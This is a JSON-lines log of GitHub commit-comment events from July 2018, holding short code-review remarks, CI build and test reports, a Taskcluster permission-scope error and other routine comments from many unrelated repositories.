{"id":"7926024879","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614957,"position":33,"line":17,"path":"ticketing/views/UserStore.py","commit_id":"a318bc2bf3937ec2827f17a8ef28177c9d5d4da0","created_at":"2018-07-05T23:17:34Z","updated_at":"2018-07-05T23:17:34Z","author_association":"COLLABORATOR","body":"see above"}},"created_at":"2018-07-05T23:17:34Z"}
{"id":"7926025437","type":"CommitCommentEvent","actor":{"login":"SkinnyTaco"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29614958,"position":45,"line":116,"path":"app/src/main/java/com/example/android/quakereport/EarthquakeActivity.java","commit_id":"f0f9cd5ee7a8d67bd2e6f7e2539664a95499831b","created_at":"2018-07-05T23:17:45Z","updated_at":"2018-07-05T23:17:45Z","author_association":"NONE","body":"This is already done on line 65, so I don't think it is necessary."}},"created_at":"2018-07-05T23:17:45Z"}
{"id":"7926026184","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614961,"position":46,"line":22,"path":"ticketing/views/UserStore.py","commit_id":"a318bc2bf3937ec2827f17a8ef28177c9d5d4da0","created_at":"2018-07-05T23:18:03Z","updated_at":"2018-07-05T23:18:03Z","author_association":"COLLABORATOR","body":"these four lines can be combined into 2 for clarity:\r\nlist_col = [col1]\r\nlist_val = [val1]"}},"created_at":"2018-07-05T23:18:03Z"}
{"id":"7926027019","type":"CommitCommentEvent","actor":{"login":"tritao"},"repo":{"name":"mono/CppSharp"},"payload":{"comment":{"id":29614963,"position":7,"line":82,"path":"src/Generator/Generator.cs","commit_id":"fb31a85b903c9028106c33c6ddcf9f89bf4a2ddf","created_at":"2018-07-05T23:18:21Z","updated_at":"2018-07-05T23:18:21Z","author_association":"COLLABORATOR","body":"Thanks for the heads-up... I sent a fix."}},"created_at":"2018-07-05T23:18:21Z"}
{"id":"7926027448","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614965,"position":24,"line":9,"path":"ticketing/views/MessageDb.py","commit_id":"a318bc2bf3937ec2827f17a8ef28177c9d5d4da0","created_at":"2018-07-05T23:18:32Z","updated_at":"2018-07-05T23:18:32Z","author_association":"COLLABORATOR","body":"these two lines can be combined into one line for clarity:\r\nlist_col = ['MessageID']"}},"created_at":"2018-07-05T23:18:32Z"}
{"id":"7926028033","type":"CommitCommentEvent","actor":{"login":"david4096"},"repo":{"name":"DataBiosphere/dos-gdc-lambda"},"payload":{"comment":{"id":29614969,"position":null,"line":null,"path":null,"commit_id":"504e9c664053712b9ca85de6bcb3c8ce7de189b4","created_at":"2018-07-05T23:18:45Z","updated_at":"2018-07-05T23:18:45Z","author_association":"MEMBER","body":"Thanks!"}},"created_at":"2018-07-05T23:18:45Z"}
{"id":"7926028255","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"NateWickstrom/splitter-solidity"},"payload":{"comment":{"id":29614970,"position":4,"line":4,"path":"contracts/Splitter.sol","commit_id":"a05c7c2503288544a266209c124141c8ddc823c9","created_at":"2018-07-05T23:18:51Z","updated_at":"2018-07-05T23:18:51Z","author_association":"NONE","body":"You could go nuts and make it Pausable with OpenZeppelin's Pausable contract, which also gives you an `owner`. This will give you some introduction to inheritance if you haven't seen it yet. "}},"created_at":"2018-07-05T23:18:51Z"}
{"id":"7926030131","type":"CommitCommentEvent","actor":{"login":"RyanAsherStevens"},"repo":{"name":"RyanAsherStevens/First-Repository-"},"payload":{"comment":{"id":29614978,"position":null,"line":null,"path":null,"commit_id":"d0406332052e144df0d8045d31266e76fe061600","created_at":"2018-07-05T23:19:34Z","updated_at":"2018-07-05T23:19:34Z","author_association":"OWNER","body":"added more styles to CSS"}},"created_at":"2018-07-05T23:19:34Z"}
{"id":"7926030388","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614980,"position":39,"line":17,"path":"ticketing/views/MessageDb.py","commit_id":"a318bc2bf3937ec2827f17a8ef28177c9d5d4da0","created_at":"2018-07-05T23:19:39Z","updated_at":"2018-07-05T23:19:39Z","author_association":"COLLABORATOR","body":"where is the variable message defined?\r\nshouldnt you be passing in the string 'messages' to indicate this should read from the users table?"}},"created_at":"2018-07-05T23:19:39Z"}
{"id":"7926030624","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614981,"position":57,"line":27,"path":"ticketing/views/MessageDb.py","commit_id":"a318bc2bf3937ec2827f17a8ef28177c9d5d4da0","created_at":"2018-07-05T23:19:45Z","updated_at":"2018-07-05T23:19:45Z","author_association":"COLLABORATOR","body":"see above"}},"created_at":"2018-07-05T23:19:45Z"}
{"id":"7926031173","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614982,"position":51,"line":27,"path":"ticketing/views/UserStore.py","commit_id":"a318bc2bf3937ec2827f17a8ef28177c9d5d4da0","created_at":"2018-07-05T23:19:57Z","updated_at":"2018-07-05T23:19:57Z","author_association":"COLLABORATOR","body":"see above"}},"created_at":"2018-07-05T23:19:57Z"}
{"id":"7926036604","type":"CommitCommentEvent","actor":{"login":"kitkathuang"},"repo":{"name":"kitkathuang/hpa-custom-controller"},"payload":{"comment":{"id":29614994,"position":5,"line":30,"path":"main.go","commit_id":"e03fd4ac5faa5f440ba1db27eba94a2d158e23d4","created_at":"2018-07-05T23:21:55Z","updated_at":"2018-07-05T23:21:55Z","author_association":"OWNER","body":"NewFilteredSharedInformerFactory is deprecated but I'm using k8s 1.9 and so using client-go 6.0 "}},"created_at":"2018-07-05T23:21:55Z"}
{"id":"7926041596","type":"CommitCommentEvent","actor":{"login":"Nipodemos"},"repo":{"name":"eventMacrosBR/up_1_ao_99_todas_classes-bro"},"payload":{"comment":{"id":29615005,"position":7,"line":302,"path":"classes/sentinela/skills-e-itens.pm","commit_id":"2cf774aaa58b833e798d039776c184658ed01cdf","created_at":"2018-07-05T23:23:47Z","updated_at":"2018-07-05T23:23:47Z","author_association":"COLLABORATOR","body":"uma coisa que aprendi da pior forma possível\r\no ConfigKeyNot dessa forma, vai ativar mesmo que a config não exista, que tecnicamente é o certo. Mas não é o que queremos, queremos que só ative caso exista a buyAuto_1_zeny\r\n"}},"created_at":"2018-07-05T23:23:47Z"}
{"id":"7926055779","type":"CommitCommentEvent","actor":{"login":"selfissued"},"repo":{"name":"w3c/webauthn"},"payload":{"comment":{"id":29615033,"position":null,"line":null,"path":null,"commit_id":"57c2b8f03f44c8febd8d50bd49a80bb935306058","created_at":"2018-07-05T23:29:16Z","updated_at":"2018-07-05T23:29:16Z","author_association":"CONTRIBUTOR","body":"This did make me happy! ;-)"}},"created_at":"2018-07-05T23:29:16Z"}
{"id":"7926059263","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29615046,"position":null,"line":null,"path":null,"commit_id":"6a075867b02f7d6f4f077a6733032347cd547cdf","created_at":"2018-07-05T23:30:30Z","updated_at":"2018-07-05T23:30:30Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1682 of 1682 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.17%25-green.png)</a>\n"}},"created_at":"2018-07-05T23:30:30Z"}
{"id":"7926062874","type":"CommitCommentEvent","actor":{"login":"dlopezg3"},"repo":{"name":"mferreri7/apparki"},"payload":{"comment":{"id":29615050,"position":null,"line":null,"path":null,"commit_id":"5a598285148597ae111153d2f52e25f0b9c4f7d9","created_at":"2018-07-05T23:31:55Z","updated_at":"2018-07-05T23:31:55Z","author_association":"COLLABORATOR","body":"Mk no pude convertir por defecto la columna en money.  me salía este error cada que iba a crear tickets: \"money#== supports only zero numerics\".  la deje en string y cada que la voy a usar la convierto a moneda con .to_money que es un metodo de la gema  también"}},"created_at":"2018-07-05T23:31:55Z"}
{"id":"7926085400","type":"CommitCommentEvent","actor":{"login":"AriDEV"},"repo":{"name":"ProjectSkyfire/SkyFire.548"},"payload":{"comment":{"id":29615111,"position":5,"line":93,"path":"dep/acelite/ace/OS_NS_dlfcn.inl","commit_id":"cabff442781e6219e8ab0fd2f276b430d95a8dfe","created_at":"2018-07-05T23:40:47Z","updated_at":"2018-07-05T23:40:47Z","author_association":"MEMBER","body":"https://www.youtube.com/watch?v=Wz_fXylhwfA"}},"created_at":"2018-07-05T23:40:47Z"}
{"id":"7926086379","type":"CommitCommentEvent","actor":{"login":"hipyhop"},"repo":{"name":"holtzy/data_to_viz"},"payload":{"comment":{"id":29615113,"position":102,"line":2419,"path":"index.html","commit_id":"5addec144119a79e6d3adcd403f13f4167f9daf6","created_at":"2018-07-05T23:41:13Z","updated_at":"2018-07-05T23:41:13Z","author_association":"CONTRIBUTOR","body":"Oops! "}},"created_at":"2018-07-05T23:41:13Z"}
{"id":"7926087465","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29615115,"position":null,"line":null,"path":null,"commit_id":"11d3f513e2a6a287e09cdfe45b565de82d6ebe17","created_at":"2018-07-05T23:41:39Z","updated_at":"2018-07-05T23:41:39Z","author_association":"NONE","body":"HotFix-FailingHXUnitTest (Myoldmopar) - x86_64-MacOS-10.9-clang: Tests Failed (1385 of 2932 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11d3f513e2a6a287e09cdfe45b565de82d6ebe17-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11d3f513e2a6a287e09cdfe45b565de82d6ebe17-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.24%25-red.png)</a> \n"}},"created_at":"2018-07-05T23:41:39Z"}
{"id":"7926089768","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/speechrecognition-feedstock"},"payload":{"comment":{"id":29615125,"position":null,"line":null,"path":null,"commit_id":"5a6648d3c34b83a49d591d3460a92884251986d1","created_at":"2018-07-05T23:42:34Z","updated_at":"2018-07-05T23:42:34Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @curtlh were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T23:42:34Z"}
{"id":"7926090284","type":"CommitCommentEvent","actor":{"login":"dicrow21"},"repo":{"name":"dicrow21/hello-word"},"payload":{"comment":{"id":29615126,"position":null,"line":null,"path":null,"commit_id":"9900b33f27ab9a56667487038c6a927d5fe2fbf5","created_at":"2018-07-05T23:42:46Z","updated_at":"2018-07-05T23:42:46Z","author_association":"OWNER","body":"sdfsdfsdfdsf"}},"created_at":"2018-07-05T23:42:46Z"}
{"id":"7926092123","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29615132,"position":null,"line":null,"path":null,"commit_id":"e06c1770e6d68a72699b70937605c45bb73c8e14","created_at":"2018-07-05T23:43:31Z","updated_at":"2018-07-05T23:43:31Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-731](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-731).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-731-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T23:43:31Z"}
{"id":"7926096369","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29615141,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-05T23:45:14Z","updated_at":"2018-07-05T23:45:14Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - i386-Windows-7-VisualStudio-14: OK (2928 of 2928 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-05T23:45:14Z"}
{"id":"7926099130","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29615148,"position":null,"line":null,"path":null,"commit_id":"77488ad8d12b0aa3973139a653dd08ef33d37b2a","created_at":"2018-07-05T23:46:21Z","updated_at":"2018-07-05T23:46:21Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-732](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-732).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-732-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T23:46:21Z"}
{"id":"7926101444","type":"CommitCommentEvent","actor":{"login":"Etaglibash"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29615153,"position":null,"line":null,"path":null,"commit_id":"bcc590e94a2eb2c61629c78216923f5a60ea6ee2","created_at":"2018-07-05T23:47:16Z","updated_at":"2018-07-05T23:47:16Z","author_association":"CONTRIBUTOR","body":"¿Porqué le cambian el formato si así funciona?\r\nEn todos los lenguajes el formato es como yo lo dejé."}},"created_at":"2018-07-05T23:47:16Z"}
{"id":"7926108981","type":"CommitCommentEvent","actor":{"login":"wdconinc"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29615170,"position":null,"line":null,"path":null,"commit_id":"f1762734561967e689b1dfbea99971731c2d833f","created_at":"2018-07-05T23:50:15Z","updated_at":"2018-07-05T23:50:15Z","author_association":"MEMBER","body":"Do you see something like:\r\n```\r\ndet_4010 detects optical photons\r\ndet_4011 detects optical photons\r\ndet_4000 detects optical photons\r\ndet_4020 detects optical photons\r\n```\r\n?"}},"created_at":"2018-07-05T23:50:15Z"}
{"id":"7926111049","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29615173,"position":null,"line":null,"path":null,"commit_id":"bcc590e94a2eb2c61629c78216923f5a60ea6ee2","created_at":"2018-07-05T23:51:04Z","updated_at":"2018-07-05T23:51:04Z","author_association":"CONTRIBUTOR","body":"Ya en la 1.0 cambió. Ahora usan nodos. Es más facil hacer las ediciones así. Dejé un Hilo al respecto. "}},"created_at":"2018-07-05T23:51:04Z"}
{"id":"7926111618","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29615175,"position":null,"line":null,"path":null,"commit_id":"465fab781ad5e3aacad512966b988f79d315a822","created_at":"2018-07-05T23:51:18Z","updated_at":"2018-07-05T23:51:18Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Colocar máscara nos campos necessários](https://trello.com/c/dnsMVQrd/197-colocar-m%C3%A1scara-nos-campos-necess%C3%A1rios)"}},"created_at":"2018-07-05T23:51:18Z"}
{"id":"7926112489","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/saltfs"},"payload":{"comment":{"id":29615178,"position":null,"line":null,"path":null,"commit_id":"4869514875fc2f1e619f51f4162bc6aafb455cf4","created_at":"2018-07-05T23:51:40Z","updated_at":"2018-07-05T23:51:40Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n        {\n          \"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n            \"queue:task-group-id:taskcluster-github/U3sQnDYrQBiPSE6lT2UcOg\",\n            \"queue:schedule-task:taskcluster-github/U3sQnDYrQBiPSE6lT2UcOg/U3sQnDYrQBiPSE6lT2UcOg\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/servo/saltfs:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:task-group-id:taskcluster-github/U3sQnDYrQBiPSE6lT2UcOg\",\n                \"queue:schedule-task:taskcluster-github/U3sQnDYrQBiPSE6lT2UcOg/U3sQnDYrQBiPSE6lT2UcOg\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-05T23:51:40.390Z\n\n</details>"}},"created_at":"2018-07-05T23:51:40Z"}
{"id":"7926115308","type":"CommitCommentEvent","actor":{"login":"vijayaeluri"},"repo":{"name":"vijayaeluri/mycharacters"},"payload":{"comment":{"id":29615186,"position":null,"line":null,"path":null,"commit_id":"eae16afd5ecb6127194ab787eea93cf305ebe760","created_at":"2018-07-05T23:52:49Z","updated_at":"2018-07-05T23:52:49Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-05T23:52:49Z"}
{"id":"7926116130","type":"CommitCommentEvent","actor":{"login":"Cdca12"},"repo":{"name":"Cdca12/ShooterGame"},"payload":{"comment":{"id":29615189,"position":null,"line":null,"path":null,"commit_id":"760f64069bb5ceaa5f863b46818b583cc122dc3d","created_at":"2018-07-05T23:53:10Z","updated_at":"2018-07-05T23:53:10Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [S01: Crear un producto mínimo viable](https://trello.com/c/DUF4mw1f/12-s01-crear-un-producto-m%C3%ADnimo-viable)"}},"created_at":"2018-07-05T23:53:10Z"}
{"id":"7926116148","type":"CommitCommentEvent","actor":{"login":"thdavids07"},"repo":{"name":"valor-software/ng2-dragula"},"payload":{"comment":{"id":29615190,"position":null,"line":null,"path":null,"commit_id":"98e00157e89c76f66a4d3905f40bcbac10367ad8","created_at":"2018-07-05T23:53:10Z","updated_at":"2018-07-05T23:53:10Z","author_association":"NONE","body":"A question, the last version is 1.6.0 but in NPM I still watching 1.5.0 version.\r\n\r\nPlease could you update too.  Thanks"}},"created_at":"2018-07-05T23:53:10Z"}
{"id":"7926117181","type":"CommitCommentEvent","actor":{"login":"holtzy"},"repo":{"name":"holtzy/data_to_viz"},"payload":{"comment":{"id":29615192,"position":102,"line":2419,"path":"index.html","commit_id":"5addec144119a79e6d3adcd403f13f4167f9daf6","created_at":"2018-07-05T23:53:35Z","updated_at":"2018-07-05T23:53:35Z","author_association":"OWNER","body":":) found it easily"}},"created_at":"2018-07-05T23:53:35Z"}
{"id":"7926117795","type":"CommitCommentEvent","actor":{"login":"holtzy"},"repo":{"name":"holtzy/data_to_viz"},"payload":{"comment":{"id":29615194,"position":102,"line":2419,"path":"index.html","commit_id":"5addec144119a79e6d3adcd403f13f4167f9daf6","created_at":"2018-07-05T23:53:49Z","updated_at":"2018-07-05T23:53:49Z","author_association":"OWNER","body":"quite weird though\r\n"}},"created_at":"2018-07-05T23:53:49Z"}
{"id":"7926119651","type":"CommitCommentEvent","actor":{"login":"vitorsilverio"},"repo":{"name":"eventMacrosBR/up_1_ao_99_todas_classes-bro"},"payload":{"comment":{"id":29615200,"position":7,"line":302,"path":"classes/sentinela/skills-e-itens.pm","commit_id":"2cf774aaa58b833e798d039776c184658ed01cdf","created_at":"2018-07-05T23:54:33Z","updated_at":"2018-07-05T23:54:33Z","author_association":"CONTRIBUTOR","body":"Percebi, que não da certo, vou reverter esse linha"}},"created_at":"2018-07-05T23:54:33Z"}
{"id":"7926125626","type":"CommitCommentEvent","actor":{"login":"cameronc137"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29615211,"position":null,"line":null,"path":null,"commit_id":"f1762734561967e689b1dfbea99971731c2d833f","created_at":"2018-07-05T23:56:56Z","updated_at":"2018-07-05T23:56:56Z","author_association":"CONTRIBUTOR","body":"I see those lines, but the hit.pid==0 cut kills everything and the scan returns nothing."}},"created_at":"2018-07-05T23:56:56Z"}
{"id":"7926126788","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29615215,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-05T23:57:27Z","updated_at":"2018-07-05T23:57:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T23:57:27Z"}
{"id":"7926129169","type":"CommitCommentEvent","actor":{"login":"kotchchanipa2"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":29615221,"position":4,"line":907,"path":"src/app/ui/palette_view.cpp","commit_id":"7f2082e89cf4c14899a7d018d4905cb92fe471a7","created_at":"2018-07-05T23:58:29Z","updated_at":"2018-07-05T23:58:29Z","author_association":"NONE","body":"green"}},"created_at":"2018-07-05T23:58:29Z"}
{"id":"7920726908","type":"CommitCommentEvent","actor":{"login":"underdarkskies"},"repo":{"name":"ka87/cpsumon"},"payload":{"comment":{"id":29600968,"position":null,"line":null,"path":null,"commit_id":"fd639684d7f9fe7aef9c8662d5f91e3fc8745e52","created_at":"2018-07-05T03:00:27Z","updated_at":"2018-07-05T03:00:27Z","author_association":"NONE","body":"how do i actually adjust fan mode and fixed percent via cpsumoncli ?\r\n"}},"created_at":"2018-07-05T03:00:27Z"}
{"id":"7920727481","type":"CommitCommentEvent","actor":{"login":"hailton"},"repo":{"name":"Asheraf/Translation"},"payload":{"comment":{"id":29600969,"position":null,"line":null,"path":null,"commit_id":"39a0ee396ce48b3efd5dc2ac413cf879821d7336","created_at":"2018-07-05T03:00:40Z","updated_at":"2018-07-05T03:00:40Z","author_association":"NONE","body":"[Contribution] Texture Translation 100%\r\nDownload: http://goo.gl/JYx8jM\r\n- iRO + kRO based\r\n- refined"}},"created_at":"2018-07-05T03:00:40Z"}
{"id":"7920728970","type":"CommitCommentEvent","actor":{"login":"DamasMahardi"},"repo":{"name":"DamasMahardi/utsdamas"},"payload":{"comment":{"id":29600971,"position":9,"line":9,"path":"README.md","commit_id":"476842d3c1bf0ef1ee9725c8b83d941b2fc41033","created_at":"2018-07-05T03:01:16Z","updated_at":"2018-07-05T03:01:16Z","author_association":"OWNER","body":"![screenshot-2018-7-4 profile](https://user-images.githubusercontent.com/35065946/42300366-4e91b96c-803a-11e8-9cc9-ca85d65f6f1c.png)\r\n"}},"created_at":"2018-07-05T03:01:16Z"}
{"id":"7920731473","type":"CommitCommentEvent","actor":{"login":"DamasMahardi"},"repo":{"name":"DamasMahardi/utsdamas"},"payload":{"comment":{"id":29600982,"position":14,"line":14,"path":"README.md","commit_id":"476842d3c1bf0ef1ee9725c8b83d941b2fc41033","created_at":"2018-07-05T03:02:22Z","updated_at":"2018-07-05T03:02:22Z","author_association":"OWNER","body":"![screenshot-2018-7-4 contact](https://user-images.githubusercontent.com/35065946/42300390-75b8191e-803a-11e8-86e2-0c40437c9539.png)\r\n"}},"created_at":"2018-07-05T03:02:22Z"}
{"id":"7920735149","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29600991,"position":null,"line":null,"path":null,"commit_id":"fb6546440b270cc144874a629e6930f014d02aee","created_at":"2018-07-05T03:04:01Z","updated_at":"2018-07-05T03:04:01Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - i386-Windows-7-VisualStudio-14: OK (2931 of 2932 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-05T03:04:01Z"}
